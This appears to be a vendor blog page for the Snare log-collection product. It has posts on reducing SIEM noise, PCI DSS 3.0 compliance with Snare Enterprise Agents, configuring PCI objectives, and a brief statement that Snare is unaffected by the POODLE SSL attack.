Not sure what Snare does? Looking for a logging or SIEM solution but not sure how Snare fits? Our own Gene McGowan threw this video together to quickly cover the full gamut of Snare. Want the fastest overview of Snare possible? Watch this video.
If you have any questions or would like to know more just reach out to us!
We like to tout Snare’s ability to “reduce the noise” in your logging efforts but what exactly do we mean when we say that and why is it important?
Event logging veterans can probably guess fairly easily that we are talking about the excess data collected by logging solutions, but because collecting everything has been a go-to tactic for so long maybe all that wasteful data bogging down your network and driving up SIEM costs doesn’t seem like noise but an inconvenient but unavoidable by-product. Many more probably don’t even realize how much junk is clogging up their SIEM and network.
Snare started off as the only rock solid log collector that could bring together logs on disparate systems and aggregate them for analysis. In other words you could count on your logs getting collected, something far too many tools still can’t guarantee, and you could see your syslogs and windows event logs in one place. Snare Agents are also agnostic so no matter what SIEM solution you opted to by, if you were having trouble with the logs you can plug and play Snare Agents to solve those problems. SIEM vendors picked up on this and began recommending Snare Agents as a compliment and that is how we took off.
Fast forward a bit and we here at Intersect Alliance wanted to take it a step further. Clients around the globe had a long list of nice to haves, things that would make their SIEM efforts more efficient and more effective. This was the genesis to the premium features you see today. Things like managing audit policy, truncation of windows event descriptive text, and multi-tiered filtering.
Cool, huh? Well, we think so. Our roadmap has filled out and we are excited to continue bringing more premium features to our Snare suite.
If you’re dealing with any form of payment card data, starting on January 2015, security audits will need to prove PCI 3.0 compliance. Banks, card brands and regulators are stepping up action in the face of recent significant breaches in name brand companies. If you are running the unsupported open source agent for event logging, you will most likely fail your audit as they do not address several key aspects of the PCI DSS V3.0 audit requirements:
1. There is no technical, product, vendor or customer support – i.e. you are on an unsupported security tool/platform.
2. More than half of the critical event log data is in the custom event logs which are not processed by the open source agents, allowing forensic evidence to be lost.**
3. Best Practices, such as event data encryption, TCP protocols and caching in case of network outages or spikes, are not available.
To take a crucial step towards compliance, we encourage you to try the Snare Enterprise Agents, which are used by the world’s leading organizations and enterprises in finance, defense, e-commerce and retail.
Snare Enterprise Agents assist with PCI DSS compliance by collecting all applicable event logs out-of-the-Box. To learn how the Snare Enterprise agent is used to address PCI, click on PCI DSS Best Practices with Snare Enterprise Agents.
For Snare Server, sample PCI objectives may be loaded. To do this go to SYSTEM\Administrative Tools\Snare Server Configuration Wizard\ and navigate to the section on additional objectives near the bottom of the list. Select the last option which will import from the local system. Once loaded you will now have the extra objectives in the Reports Menu under Compliance Pack, in there are: NISPOM, SOX and PCI. From there you can copy/clone these objectives and customise to suit your needs.
** Warning about Open Source logging: You risk missing more than half of your critical logs
The Open Source agents will not stand up to compliance or auditing standards (e.g. PCI), with more than half of the critical logs not being captured, including privileged user activity, system and Group Policy changes, dhcp logs, system time changes, host firewall policy changes and access logs, terminal service access, and print logs, just to name a few. Therefore, using open source versions will risk failing audits and will not be able to detect all serious malicious attacks or unauthorized changes on your systems. This can lead to loss of customer data, major brand damage and significant financial penalties depending upon which standard has been failed and the degree of damage caused. There are approximately 70 system event logs which you will not collect details from.
The POODLE attack (which stands for “Padding Oracle On Downgraded Legacy Encryption”) is a man-in-the-middle exploit which takes advantage of Internet and security software clients’ fallback to SSL 3.0.
The Snare Agents are not affected by POODLE as it requires a cookie injection from the client and Snare does not use cookies for our connections.
Since it’s a client side attack, and would need some man-in-the-middle attack on the internal network which is low risk, and given most Snare Servers are on restricted networks, then it is low risk.
For additional information review US-CERT TA14-290A.
We may request cookies to be set on your device. We use cookies to let us know when you visit our websites, how you interact with us, to enrich your user experience, and to customize your relationship with our website.
Click on the different category headings to find out more. You can also change some of your preferences. Note that blocking some types of cookies may impact your experience on our websites and the services we are able to offer.
These cookies are strictly necessary to provide you with services available through our website and to use some of its features.
Because these cookies are strictly necessary to deliver the website, refuseing them will have impact how our site functions. You always can block or delete cookies by changing your browser settings and force blocking all cookies on this website. But this will always prompt you to accept/refuse cookies when revisiting our site.
We fully respect if you want to refuse cookies but to avoid asking you again and again kindly allow us to store a cookie for that. You are free to opt out any time or opt in for other cookies to get a better experience. If you refuse cookies we will remove all set cookies in our domain.
We provide you with a list of stored cookies on your computer in our domain so you can check what we stored. Due to security reasons we are not able to show or modify cookies from other domains. You can check these in your browser security settings.
These cookies collect information that is used either in aggregate form to help us understand how our website is being used or how effective our marketing campaigns are, or to help us customize our website and application for you in order to enhance your experience.
If you do not want that we track your visist to our site you can disable tracking in your browser here:
We also use different external services like Google Webfonts, Google Maps, and external Video providers. Since these providers may collect personal data like your IP address we allow you to block them here. Please be aware that this might heavily reduce the functionality and appearance of our site. Changes will take effect once you reload the page.
Google Webfont Settings:
Google Map Settings:
Vimeo and Youtube video embeds:
You can read about our cookies and privacy settings in detail on our Privacy Policy Page.